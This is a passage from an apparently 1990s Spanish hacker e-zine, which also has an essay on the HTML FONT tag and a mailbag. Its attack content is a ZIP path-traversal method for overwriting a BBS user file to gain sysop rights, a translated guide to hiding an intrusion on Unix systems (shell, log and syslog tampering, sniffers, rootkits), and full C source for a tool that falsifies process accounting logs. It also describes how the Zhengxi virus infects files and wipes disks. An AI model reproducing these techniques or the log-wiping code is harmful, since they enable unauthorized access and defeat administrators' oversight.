Lo que estamos a punto de aprender es a crear nuestro propio USERS.DAT en
esa BBS y ponernos una cuenta con privilegios SYSOP.
Primero necesitariamos preparar nuestro archivo ZIP de la siguiente forma:
C:\>md tmp
C:\>md c:\tmp\ddsdata
C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata
C:\>cd tmp
C:\TMP>pkzip -pr evil.zip
A continuacion, usando un editor hexadecimal editamos evil.zip. Debes cambiar
todas las partes donde aparezca "ddsdata" en evil.zip a "../data" y asegurate
que uses las diagonal correcta. Ahora cuando copies el archivo evil.zip
sera descomprimido a "../data/users.dat" y el archivo users.dat tuyo sera
el que sobre escriba al archivo original siempre y cuando la BBS descomprima
los archivos usando el flag -od que es default en Renegade.
Si creas el USERS.DAT usando una copia tuya de renegade puedes ser el sysop
y poner el password que te guste mas :-). Muchas BBS's tienen esta
vulnerabilidad pero el truco consiste en seguir las siguientes reglas:
- Puedes moverte por los directorios unicamente si el nombre del archivo
es de maximo 12 digitos (8 mas "." y la extension).
- El archivo ZIP se corrompe cuando tratas de crear muchos directorios.
La efectividad depende en que tan bien conoscas los directorios de una
BBS pero puedes lograr sobre-escribir archivos en cualquier directorio
sin tener que ser el USERS.DAT
Si remueven el flag -o, el sistema aun es vulnerable si editando tu zip
haces dos archivos con el mismo nombre. Esto "cuelga" el sistema cuando trata
de sobre-escribir al otro archivo. El unico remedio es remover el flag -d
a la hora de descomprimir los archivos y dejar el -o.
=--=--=--=00=--=--=--=
[ Esta tecnica de modificar los ZIPs es ilimitable en sus posibilidades ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
øøøøøøøøøøøøøøøøøøøøøøøøøøø
ø Como cubrir tus Huellas ø
ø ß ß ß ß ß ß ß ß ß ß ø
øøøøøøøøøøøøøøøøøøøøøøøøøøø
SEGUNDA PARTE: PRACTICA
I. EL PRIMER COMANDO
El primer comando que debes ejecutar despues de entrar a un sistema con
una cuenta hackeada es cambiar de shell. El proposito es el evitar que
los comandos que ejecutes terminen en el archivo .history
Una revision de este archivo por el usuario real o el administrador
revelaria tu presencia y lo que hiciste!
Si estas ejecutando el shell CSH, entonces cambia a shell SH y vice versa.
$ <- Prompt SH
% <- prompt CSH
Si no usan en el sistema los prompts standards, ejecuta SH. Si el prompt
permanece igual escribe "exit" y ejecuta CSH ...
II. ULTIMO TRABAJO CON LOS LOGS
Si cuando entras a un sistema con una cuenta hackeada y aparece en tu
pantalla un mensaje como "Last successful login from alpha.master.mil"
significa que el usuario de esa cuenta es notificado desde donde entraron
por ultima vez usando su cuenta. Para evadir este problema sin hackear
root o no quieres borrar/editar archivos entonces ejecuta "rlogin <host>"
y usa la misma cuenta para entrar al sistema de nuevo. despues escribe
exit para regresar de nuevo a la primer entrada.
Esto cambiara el texto avisando al usuario la proxima vez que entre
un log asi <current host> o "localhost".
III. EVASION DE WHO
Despues de completar los pasos 1 y 2 escribe "w"...veras todos los
usuarios actualmente en linea y tambien la direccion desde donde entraron.
Si tu estas en Mexico y entras a un sistema americano, esto se vera muy
sospechoso para los que usen "w".
Para sobrepasar este error sin necesidad de ser root necesitas tan solo
ejecutar "login" con el mismo username y password. Si ese sistema tiene
el bug de las versiones recientes de unix, tu direccion origen sera
modificada a "tty05".
V. EJECUTAR PROGRAMAS
No ejecutes programas con nombres sospechosos ... ISS y YPX son por
ejemplo muy sospechosos y un administrador con un poco de cerebro
notara algo raro cuando vea a un usuario ejecutando "loadmodule hack"
en su Sun.
Deberas copiar y renombrar los comandos para que nadie sospeche.
La lista de procesos puede ser checada con "ps -ef" o "ps -auxwww" y
los programas que consuman mas proceso del CPU apareceran con "top" ...
asi que es muy facil monitorear los programas que los usuarios esten
ejecutando.
VI. TELNET
Solo hay dos cosas que deben decirse sobre usar telnet con propositos de
hackear. Primero NUNCA escribas "telnet objetivo.com.mx". Escribe "telnet"
y despues "open objetivo.com.mx" que no mostrara como parametro en la lista
de procesos a que sitio estas haciendo telnet. Segundo, algunos clientes
telnet exportan variables de ambiente del sistema. Si tu hack es detectado
y ellos pueden tracearte hasta el host origen ellos tambien tendran el
nombre de la cuenta que usaste en el host origen. Asi que debes definir
a cualquier cosa que quieras las siguientes variables antes de empezar
telnet, rlogin o similares: USER, LOGNAME, UID, HOME, MAIL
Para cambiar esas variables:
SH : <variable>=<nuevo valor>;export <variable>
ejemplo : USER=nadie;export USER
CSH : setenv <variable> <nuevo valor>
ejemplo : setenv USER nadie
VII. REMUEVE TUS ARCHIVOS
Cuanto intentes exploits -con exito o sin el- borralos inmediatamente
despues de usarlos - especialmente si los usas en /tmp !
Si realmente necesitas trabajar en el directorio temporal (/incoming /temp)
entonces crea un directorio como ".X11", y dale atributo 711.
--> ! Los siguientes 2 puntos solo son posibles con acceso root ! <--
VI. MODIFICAR LOS LOGS
Los logs mas importantes son LASTLOG, WTMP y UTMP
Si tuviste exito en volverte root debes modificarlas.
Pueden ser usualmente encontrados en /etc, /var/adm o /var/log pero
pueden estar en cualquier otra parte.
Que herramientas debo usar? ZAP (o ZAP2) es bueno, pero no te BORRA de los
logs sino sobre-escribe las entradas con ceros.
Antes de compilar ZAP debes revisar los paths definidos para los logs!
Debes usar CLOAK2 que cambia los datos importantes en los logs pero no es
posible compilarlo en todos los sistemas.
Tambien puedes intentar CLEAR que REALMENTE elimina las entradas.
VII. SYSLOG & LASTCOMM
Debes checar el archivo de mensajes del logfile donde tal vez las entradas
con tu cuenta hackeada se encuentren ahi. Usualmente se encuentra en
/var/adm o /var/log ... la mayor parte del tiempo se llama "messages" pero
puede tener otros nombres.
Revisa el archivo /etc/syslog.conf para saber el path y el nombre del
archivo con los logs.
Para remover tu nombre de host del archivo "messages" ejecuta:
"grep -v tu.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages"
LASTCOMM es una herramienta para guardar todos los comandos ejecutados,
es una MALIGNA herramienta contra hackers pero la mayoria de las veces
no se encuentra instalada. Ahora no tienes nada que temer, obten el
programa ACCT de Zhart's y siente la libertad.
VIII. INSTALANDO TROYAS
Cuando instales un sniffer, recuerda que cualquiera puede ejecutar
"ifconfig -a" para revisar si la tarjeta esta en modo promiscuo. Obten un
rootkit para tu sistema UNIX y reemplazalo.
X. FIN
Nunca seas flojo y recuerda revisar al 100% tus acciones - o afrenta las
consecuencias!!
-------------------------------- ACCT CLEANER --------------------------------
Usage: <progname> -u user -f user [-t time]/[-b] [-p command] [-h]
-u user_login (necessary) User to hide
-f user_login (necessary) User to fake
-t hh:mm dd/mm/yy (if not -b) Start editing from this date
-b (if not -t) Start editing from file's beginning
-p command_name (optional) Fake user only about this command
-m (optional) CountDown Mask mode
-h This help and exit
If NO arguments are given program acts in interactive mode
[- Configuration -]
You must "#undef LINUX" or comment the "#define LINUX" line if you're
compiling the program on a non-linux board.
Then you should verify that the acct file is in "/var/adm/acct", otherwise
you have to change the string "filename" in the "main" procedure.
You can set the default user id's of the user you want to hide and of the user
you want to show, stored in the variables "u_uid" & "f_uid"; this will work
if "-f" and/or "-u" options are omitted while "-b" or "-t" are used.
You can set the number of steps the program uses in the fast-search phase by
defining the pre-processor variable STEPS:
#define STEPS 500
Choose it by experimenting and comparing the dates reported by the program
(fast-search/slow-search) with the time taken to reach standard targets
(it depends on ACCT_file's size).
[ Beware that giving a starting time (when running the program) which is
relatively close (it depends on STEPS) to file's beginning time could
generate problems (tipically make the program exit without doing anything).
So, in this case, it's better (and more logical) to use the "beginning"
option. ]
#### By Zhart/THC (c) 1996 #### */
--------------------------------- Comienza Codigo-----------------------------
#define LINUX
#include <stdio.h>
#include <sys/types.h>
#include <sys/file.h>
#include <unistd.h>
#ifdef LINUX
#include <linux/acct.h>
#else
#include <sys/acct.h>
#endif
#include <time.h>
#include <pwd.h>
#include <strings.h>
#include <signal.h>
#include <fcntl.h>
#define SHOW /* Comment this line if don't want explicit evil messages */
/* compiled with the program (to protect from "strings") */
#define PWD 0 /* Set it to 1 to ask for a password in interactive mode */
/* and not showing help from command line */
#define STEPS 500 /* Number of steps to go back in fast search */
#define COUNTD 20 /* CountDown seconds (for mask mode) */
int u_uid=0; /* Default uid of user to hide */
int f_uid=3; /* Default uid of user to show */
char p_name[16]; /* Program to assign to fake_user */
int b_flag=0; /* Beginning (no date) flag */
int m_flag=0; /* CountDown Mask Mode flag */
char filename[30]; /* acct logging file */
int vWd ()
/* validatePwd - verifies program password */
{
char word[10];
char token[10];
word[0] = 'z';
word[1] = 'h';
word[2] = 'a';
word[3] = 'r';
word[4] = 't';
word[5] = '\0';
scanf ("%s",token);
if (strcmp(token,word)) return(0);
else return(1);
}
void usage()
{
#ifdef SHOW
if (!PWD) {
printf("\nUsage: <progname> -u user -f user [-t time]/[-b] [-p command] [-m] [-h]\n");
printf("-u user_login (necessary) User to hide\n");
printf("-f user_login (necessary) User to fake\n");
printf("-t hh:mm dd/mm/yy (if not -b) Start editing from this date\n");
printf("-b (if not -t) Start editing from file's beginning\n");
printf("-p command_name (optional) Fake user only about this command\n");
printf("-m (optional) CountDown Mask mode\n");
printf("-h This help\n");
printf("If NO arguments are given program acts in interactive mode\n\n");
}
#endif
}
int vUsr(char *name)
/* verifyUser - returns the uid of a user's login name */
{
struct passwd *pwt;
if((pwt = getpwnam(name)) != NULL)
return(pwt->pw_uid);
else {
#ifdef SHOW
printf ("Error: %s is not a valid user\n",name);
#endif
exit(1);
}
}
int readParams(char *args[],int ac,long *i)
{
struct tm t;
int x;
if (ac==1) return(0);
else for(x = 1; x < ac; x++) {
if(args[x][0] == '-')
switch(args[x][1]) {
case 'u': /* username to hide */
if((x + 1) < ac)
u_uid=vUsr(args[++x]);
break;
case 'f': /* fake user to be shown */
if((x + 1) < ac)
f_uid=vUsr(args[++x]);
break;
case 't': /* date since start scanning */
if((x + 2) < ac)
sscanf(args[++x],"%d:%d",&(t.tm_hour),&(t.tm_min));
sscanf(args[++x],"%d/%d/%d",&(t.tm_mday),&(t.tm_mon),&(t.tm_year));
t.tm_sec=0;
(t.tm_mon)--;
t.tm_wday=0;
t.tm_yday=0;
t.tm_isdst=0;
*i=mktime(&t);
#ifdef SHOW
printf ("\nInput time has been interpreted as: %.24s\n",ctime(i));
#endif
break;
case 'b':
b_flag=1;
break;
case 'p':
if((x+1) < ac)
strcpy(p_name,args[++x]);
break;
case 'h':
usage();
exit(1);
case 'm':
m_flag=1;
break;
}
}
return(1);
}
void readDate (long *i)
/* Reads date and returns it in UTC (seconds) */
/* Interactive mode */
{
struct tm t;
printf("Please type time,day,month,year Ex: 13:15 27/10/83\n --> ");
scanf("%d:%d %d/%d/%d",
&(t.tm_hour),&(t.tm_min),
&(t.tm_mday),&(t.tm_mon),&(t.tm_year));
t.tm_sec=0;
(t.tm_mon)--;
t.tm_wday=6;
t.tm_yday=0;
t.tm_isdst=0;
*i=mktime(&t);
printf ("Input time has been interpreted as: %.24s\n",ctime(i));
}
void rUsrs()
/* readUsers - Interactive mode */
{
char u_name[16];
char f_name[16];
#ifdef SHOW
printf("\nName of user to hide:");
#endif
printf("\n --> ");
scanf("%s",u_name);
u_uid=vUsr(u_name);
#ifdef SHOW
printf("\nName of user to show:");
#endif
printf("\n --> ");
scanf("%s",f_name);
f_uid=vUsr(f_name);
}
void Interactive(long *u_date)
{
char answer[16];
if (PWD) if (!vWd()) exit(1);
startEnd();
if (PWD) getchar();
printf ("Start from beginning? [y/N]: ");
if (getchar()=='y') b_flag=1;
else readDate(u_date);
rUsrs();
/* readProg */
getchar();
printf ("\nSpecify command? [y/N]: ");
if (getchar()=='y') {
printf(" ==> ");
scanf("%s",answer);
strcpy(p_name,answer);
}
}
int startEnd()
/* Prints dates of first and last log */
{
struct acct actbuf;
int fd;
long endtime;
#ifdef SHOW
printf ("\n######## ACCT Handler by Zhart (c) 1996 ########\n");
#endif
/* Open acct file in read-only mode*/
if((fd = open(filename,O_RDONLY)) == -1 )
return(-1);
/* read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
endtime=actbuf.ac_btime+actbuf.ac_etime;
printf("\nFile starts at: %.24s\n",ctime(&endtime));
/* GotoENd */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
(void)close(fd);
return(0);
}
/* Read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
endtime=actbuf.ac_btime+actbuf.ac_etime;
printf("File ends at: %.24s\n\n",ctime(&endtime));
(void)close(fd);
}
int reachFast (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;
/* Set offset to end of file */
if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) {
(void)close(fd);
return(0);
}
while (!found) {
/* Read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
/* Verify date */
endtime=actbuf.ac_btime+actbuf.ac_etime;
if (endtime < u_date) found=1;
else
/* Go down of STEPS lines <------ */
if(lseek(fd,(long)(-(STEPS*sizeof(actbuf))),SEEK_CUR) < 0) {
(void)close(fd);
return(0);
}
}
printf ("Date reached (fast): %.24s\n",ctime(&endtime));
}
int reachSlow (int fd,long u_date)
{
struct acct actbuf;
int found=0;
long endtime;
while (!found) {
/* Read the buffer */
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
/* Verify date */
endtime=actbuf.ac_btime+actbuf.ac_etime;
if (u_date<=endtime) found=1;
}
printf ("Date reached (slow): %.24s\n",ctime(&endtime));
}
int verifyA (struct acct actbuf)
/* verifyAct - Verifies if acct record must be edited */
{
/* return(actbuf.ac_uid==u_uid); */
if (actbuf.ac_uid==u_uid)
if (p_name[0]=='\0') return(1);
else if (!strcmp(p_name,actbuf.ac_comm)) return (1);
return(0);
}
int editA(int fd,struct acct actbuf)
/* editAct - */
{
printf("#");
fflush(stdout);
actbuf.ac_uid = f_uid;
actbuf.ac_flag &= ~ASU;
if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
(void)close(fd);
return(0);
}
if(write(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
}
int scanA (int fd)
/* scanACCT - */
{
struct acct actbuf;
#ifdef SHOW
printf ("Scanning data ...\n");
#endif
while (1) {
/* read buffer*/
if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
(void)close(fd);
return(0);
}
/* verify criteria matching and (eventually) start editing */
if (verifyA(actbuf)) editA(fd,actbuf);
}
}
main(int argc,char *argv[])
{
long u_date;
int fd;
filename[0]='/';
filename[1]='v';
filename[2]='a';
filename[3]='r';
filename[4]='/';
filename[5]='a';
filename[6]='d';
filename[7]='m';
filename[8]='/';
filename[9]='a';
filename[10]='c';
filename[11]='c';
filename[12]='t';
filename[13]='\0';
if (!readParams(argv,argc,&u_date)) Interactive(&u_date);
else startEnd();
if (m_flag) {
setuid(0);
sleep(COUNTD);
}
/* Should insert a date validation */
#ifdef SHOW
printf ("\nHiding user id: %d Showing user id: %d\n",u_uid,f_uid);
#endif
/* Open ACCT file in read/write mode */
if((fd = open(filename,O_RDWR)) == -1 )
return(-1);
if (!b_flag) {
reachFast(fd,u_date);
reachSlow(fd,u_date);
}
scanA(fd);
(void)close(fd);
printf("\n");
}
-----------------------------------FIN DEL CODIGO-----------------------------
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Texto original por Van Hauser de THC traducido y revisado por CrackSmoker
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Que hay de malo con <FONT> ?
Cuando Netscape introdujo su elemento <FONT>, con sus atributos SIZE= y
COLOR=, muchos autores de paginas web dieron la bienvenida a la promesa
de tener control sobre la presentacion de sus documentos; los mismos
autores sintieron alivio cuando Microsoft introdujo un atributo adicional
<FONT FACE=*>. Muchos de estos autores no se dieron cuenta que sus
documentos se volverian invisibles, dificiles de leer o inaccesibles a
muchas personas. Exactamente eso fue lo que paso debido a la implementacion
de estos elementos unicamente a los navegadores populares.
Las extensiones en HTML se dice que "degradan graciosamente" si no
interfieren con la legibilidad en los navegadores que no soporten esas
extenciones. Para los navegadores como Lynx, y otros que no soportan
tama¤os de fonts, colores o estilos, los efectos del elemento <FONT> son
relativamente benignos. Si el autor trata de enfatizar un texto especifico
por su tama¤o o color, el usuario del navegador de modo texto (como Lynx)
podra ver el texto pero no el enfasis.
Los verdaderamente efectos del elemento <FONT> son reservados para los
usuarios de los navegadores graficos mas populares como Netscape e Internet
Explorer.
Un usuario de netscape que tiene una laptop con una display relativamente
peque¤o tiene los small fonts configurados para poder ver una decente
cantidad de material en su pantalla. El autor de un sitio web ha dise¤ado
una tabla con <FONT SIZE=1>; este texto se mostrara tan peque¤o que sera
ilegible.
Otro usuario con problemas de vista tiene su laptop configurada con extra
large fonts, y el "dise¤ador web" decide hacer un comentario con <FONT
SIZE=4>; ahora una peque¤a frase ocupa la mayoria de la ventana, y el
usuario permanece frustrado. Un tercer usuario tiene una sofisticada
estacion de trabajo con un monitor extra grande (17"), pero, como el 10%
de los usuarios masculinos, el tiene ceguera con los colores y necesita
un fuerte contraste entre el texto ordinario y el background. El ha
configurado su navegador para que use un texto negro con fondo amarillo, y
ha especificado que esta configuracion permanezca a pesar de la pagina que
visite. Pero llega a una "kewl" web page con texto blanco y un fondo
negro. El usuario esta viendo negro en amarillo. Pero esta pagina tiene
una sentencia por aqui y por alla con <FONT COLOR="yellow">--esto puede
verse bien en el fondo negro que especifico el autor, pero es completamente
invisible en el fondo amarillo del usuario. El quizas se pregunte que
seran todos esos espacios vacios, pero a menos que vea el codigo fuente,
el nunca sabra que se pierde una parte importante del mensaje. Mientras
Netscape permite abolir los colores del cuerpo y texto de cualquier pagina,
no permite abolir los colores de los fonts.
El elemento FONT obstruye la presentacion de la informacion por hacer
demasiadas asumciones sobre el sistema del usuario, navegador y
configuracion. Si tienes algo que decir, informacion que dar a conocer,
o sentimientos que expresar, entonces es tu interes hacer tu pagina
accesible a todos. Inteligentes creadores de paginas, que desean hacer
llegar su mensaje a todos, se mantienen lejos del elemento <FONT>.
La solucion?? Hoy en dia muchas paginas permiten configurar la forma
en que deseas verlas en forma de opciones de cascada. Asi, cualquier
persona configura la pagina (no el navegador) para no perder informacion
que tal vez, pueda ser valiosa.
raretrip
[ Nota: estamos estudiando la posibilidad de remover el elemento FONT de
nuestra pagina pero aun no nos hemos decidido. sirve bastante bien para
mejorar la presentacion de una pagina ;-) ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
èèèèèèèèèèèèèèèèèèèèèèèèèèè
El padre de todos los virus
êêêêêêêêêêêêêêêêêêêêêêêêêêê
Segunda Parte
...
Antes de desinfectarlo, el virus comprueba si el fichero abierto esta
infectado usando el primer metodo (division por 9dh y resto igual 25h);
posteriormente comprueba si el fichero es local o remoto (no accede a los
discos remotos), y mira los punteros CS,SS y SP de la cabecera EXE. Tras
haber hecho esto, finalmente compara el nombre del programa que abrio el
fichero usando los CRCs con la lista de los 16 'programas fatidicos', y no
lo desinfecta en caso de coincidencia.
Al leer un fichero (ah=3fh) el virus llama a la rutina stealth. En caso
de leer algunos de los bytes de la cabecera de un fichero infectado, el
virus lee, desencripta y copia la cabecera original en el bufer de lectura,
de forma que no se apreciaran los cambios en el fichero.
Las llamadas a FindFirst/FindNext tambien son usadas por el virus para
infectar. El Zhengxi guarda el nombre de uno de los ficheros encontrados
por FindFirst, y el del quinto fichero, aproximadamente (probabilidad 3/16)
encontrado por la funcion FindNext. El virus solo tiene un bufer para
almacenar nombres de ficheros por lo que el siguiente nombre sobreescribe
al anterior.
Finalmente, al cerrar un fichero (ah=3eh), el virus busca e infecta el
fichero cuyo nombre conserva en su bufer. Ademas, tambien infecta el
fichero que se esta cerrando, solo que con una probabilidad 1/4 (el resultado
sale de un randomizer propio).
Infeccion
Antes de infectar, el Zhengxi comprueba algunas condiciones:
-El fichero no acaba de ser creado, es decir, no es un fichero reciente.
-El fichero es local y no esta ni en A: o B:
-El fichero no es *.?v?
-Hay suficiente espacio en disco (lo comprueba con ah=26h, int 21h)
En caso de cumplirse estas tres condiciones, el virus lee la cabecera y mira
si es valida usando CRC's.
Tambien hay que destacar que el virus no solo comprueba la cabecera sino que
tambien comprueba otros campos y puntos del fichero para evitar la
destruccion de ficheros de datos.
Infeccion de EXE's
Lo mas interesante del virus es cuando infecta ficheros EXE. Puede hacerlo
de tres formas: anexandose al final (appending), insertandose (inserting)
o infectando EXEs autoexpandibles (self-extracting).
Primero el Zhengxi mira la estructura del fichero; en caso de ser un fichero
autoexpandible (creado con zip2exe por ejemplo), el virus infecta el fichero
adjunto (ZIP, ARJ, RAR) usando el metodo descrito mas abajo; crea un dropper
COM y se anexa al fichero.
Despues mira la longitud. Hay que destacar que no infecta ficheros menores
a 400h (1204 bytes). Ademas chequea otros campos en la cabecera EXE, como
el numero de items de recolocacion, marcas de empaquetadores (PkLite: este
virus puede infectar ficheros comprimidos con pklite), y los campos de
longitud. Si la longitud del modulo (NO la longitud del fichero) es mayor que
32k, el virus inserta su cargador en medio del fichero. Si no, el virus
infecta el fichero usando el metodo appending.
Al infectar archivos por este metodo, el virus lee la cabecera, la encripta
y la guarda al final del fichero. Entonces ejecuta su generador polimorfico
y guarda el cuerpo del virus encriptado y los loops polimorficos al final
del fichero.
Para acabar la infeccion, el virus incrementa la longitud del fichero hasta
un valor que, dividido por 9dh, de de resto 25h (su marca de infeccion), y
modifica los punteros de la cabecera EXE.
Usando el mismo metodo CRC, el virus busca este codigo en el fichero, si no
lo encuentra, el virus pasa el control directamente a la infeccion de tipo
appending. En caso de exito, el virus busca en los siguientes 54h (80) bytes
de codigo un ret o un far call (c3h, cbh, cfh, 9ah, cah, c2h) para no
pasarse a la siguiente subrutina o direccion relocalizada. Si se encuentra
ese codigo, el virus abandona la rutina de infeccion.
Si no, el virus sobreescribe esos 54h bytes con el codigo del cargador del
virus, encripta el codigo principal con su engine polimorfica y se copia
al final del fichero. Despues de esto, al igual que hacia con el otro tipo
de infeccion (appending), escribe un numero indeterminado de bytes aleatorios
para usarlos como marca de infeccion.
Al ejecutar el cargador del virus, este busca el nombre del host en los
campos correspondientes del PSP (Program Segment Prefix), abre el fichero
para luego mover el puntero al final, y alli leer, desencriptar y ejecutar
la segunda parte del dropper. Esta parte restaura la subrutina parcheada,
ubica la memoria del sistema (convencional o UMB), lee el cuerpo del virus
y le da el control al loop de desencriptado polimorfico. Con el loop
desencripta el cuerpo del virus y le pasa el control a la rutina de
instalacion; el virus se instala en la memoria del sistema y le devuelve la
ejecucion al fichero host.
Este es un tipo de infeccion muy insidioso. El codigo virico esta escondido
en el fichero, y no hay una entrada directa hacia el mismo desde la cabecera
del fichero. El virus se inserta a si mismo en el lugar de una de las
subrutinas del host. Incluso puede tratarse de una subrutina rara vez
ejecutada. Por ejemplo, una subrutina que muestre un mensaje de error en la
pantalla. De esta forma, el virus esta en estado 'latente' durante un largo
periodo de tiempo, hasta que un buen dia 'sale al exterior' e infecta
el sistema bajo determinadas condiciones.
Infeccion de ficheros comprimidos
En este tipo de infeccion, el virus crea en memoria la imagen de un archivo
COM infectado, un dropper y lo introduce en el fichero comprimido. Este
dropper siempre empieza con un jmp seguido de datos aleatorios, el virus
encriptado, y el loop de desencriptado polimorfico. Esta introduccion (jmp)
salta directamente al inicio del loop.
El nombre del dropper tambien es aleatorio y lleva extension COM; he aqui
algunos ejemplos de los nombres que puede llegar a tener:
HAIF.COM, UCM.COM, DOO.COM, VLG.COM, etc.
Para procesar los ficheros comprimidos y todos sus campos, el virus no se
ayuda de ninguna utilidad externa. sino que usa sus propias rutinas de
descompresion de ARJ, ZIP y RAR. Sin embargo, el virus no comprime el codigo
del dropper; simplemente lo guarda en modo 'stored'.
El virus no introduce su dropper en los ficheros comprimidos con PKzip en
caso de que dentro de estos haya algun otro fichero ya comprimido con el
metodo stored. Esto esta pensado para no introducir el dropper en mas de una
ocasion dentro de los ficheros comprimidos.
Payload
El Zhengxi solo tiene un payload o rutina de activacion, excepto la que usa
para retornar al DOS desde un COM. Esta rutina puede ser ejecutada mientras
se estan procesando los archivos zips. Si el virus encuentra algun registro
empaquetado con el modo 'stored', chequea la fecha, la hora y el 'sello' o
marca del ZIP. Si el a¤o de la ultima modificacion es igual o superior a
1996, el virus busca todos los ficheros de todos los directorios, desde la
C: hasta la Z:, y los borra, incluyendo el arbol de subdirectorios (FAT).
FINAL
~~~~~
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻɻ
ºÈ¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼È¼º
º ÞÛßÛ ÞÛßßÛ ÞÛßßÛ ÞÛßÛßÜ ÞÛßßß ÞÛßßÛ ÞÛßßÛ ÞÛßÛ Û ÞÛßßß º
º ÞÛÜÛÜ ÞÛ Û ÞÛ Û ÞÛ Û Û ÞÛÜÜÜ ÞÛÜÜÛ ÞÛÜÜÛ ÞÛ Û Û ÞÛ ÜÜ º
º ÞÛÜÜÛ ÞÛÜÜÛ ÞÛÜÜÛ ÞÛ Û Û ÞÛÜÜÜ ÞÛ ÛÜ ÞÛ Û ÞÛ ÛÜÛ ÞÛÜÜÛ º
º ÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑ º
º "Tu linea de comunicacion segura con el Underground" º
º º
ºÉ»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»É»º
ȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼȼ
MailBoy: KillerBot
De nuevo un saludo a toda la p30pl3 y quisiera decirles la razon por la que
esta seccion ya no se llama "CTRL - ALT - DEL". Resulta que cuando decidimos
hacer esta seccion uno de nosotros sugirio ese nombre PERO no nos dijo que
ya existia otra revista con una seccion igual!! A pesar de que esa
publicacion quizas ni se haya enterado de que usamos el nombre de su seccion
para los mismos fines en esta revista, decidimos cambiar el nombre de ahora
en adelante a esta seccion. Saludos a los editores de esa revista -a los que
aun no conocemos- y disculpen por el error.
<<::RareGaZz::>>
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Mencionamos en un numero anterior que podian usar a televisa.com como un
servidor email que no imprimia la direccion IP pero este servidor ya no
realiza este favor a la comunidad cybernetica asi que no cuenten con que
su direccion IP no sera impresa en sus mensajes.
Mr.x
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
Saludos a estas ciudades:
Laredo Texas,
Lima Peru,
Monterrey Mexico,
Viladecans Espa¤a,
Guatemala,
Piura Peru,
Montevideo
Y a estas personas:
PECAR
Truco
Orion
Cnest
Xdawn
DuvaHazard
Monra
Por sus colaboraciones y/o apoyo para este numero.
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
por que copiaron el logo de CDC en su numero anterior para ponerle fin a
su revista asi como ellos lo usan como footer para sus textos?
[ Tienes razon, copiamos el logo de la vaca para nuestra revista. Tenemos que
admitir que es un DAMN GOOD LOGO! como muchos no saben quienes son o que
hacen los de CDC basta decir que escriben textos con temas abstractos. Al
parecer sus iniciales significan:
cult of the dead cat / cult of the disposable camera / cult of the drying
cumstain / cult of the dead canary / cult of the dead chihuaha / cult of
the dead cadillac / concentrated drag cweenz / cult of the douche condom /
cult of the dope cut / cult of the dressed cabbage / cult of the dumb
comedian / cult of the deadly carbonated_beverage / cult of the dead
canine / cult of the dumb cow / cult of the disheiferist clep / cult of the
duplicated copy / clean dildos in a cab / cows drowning cows / cult of the
dumb cult / cult of the dildo that can / crowning dead corpses / cult of
the disposable condom / cyber doodical c / can dogs croak? / cult of the
dead cornflake / cult of the distinct color / cult of the dead crib / y
